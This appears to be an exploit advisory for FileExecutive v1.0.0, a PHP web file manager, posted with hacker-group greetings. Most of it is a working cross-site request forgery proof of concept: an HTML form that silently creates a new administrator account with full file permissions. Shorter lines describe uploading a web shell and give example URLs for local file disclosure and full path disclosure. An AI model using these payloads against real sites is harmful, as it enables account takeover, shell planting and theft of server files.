==============================================================================
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
[»] FileExecutive Multiple Vulnerabilities
==============================================================================
[»] Script: [ FileExecutive v1.0.0 ]
[»] Language: [ PHP ]
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploits ]===
Add/Edit Admin CSRF:
<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td> <td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>
Shell Upload:
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
Local File Disclosure:
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
Full Path Disclosure:
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
Author: ViRuSMaN <-
###########################################################################
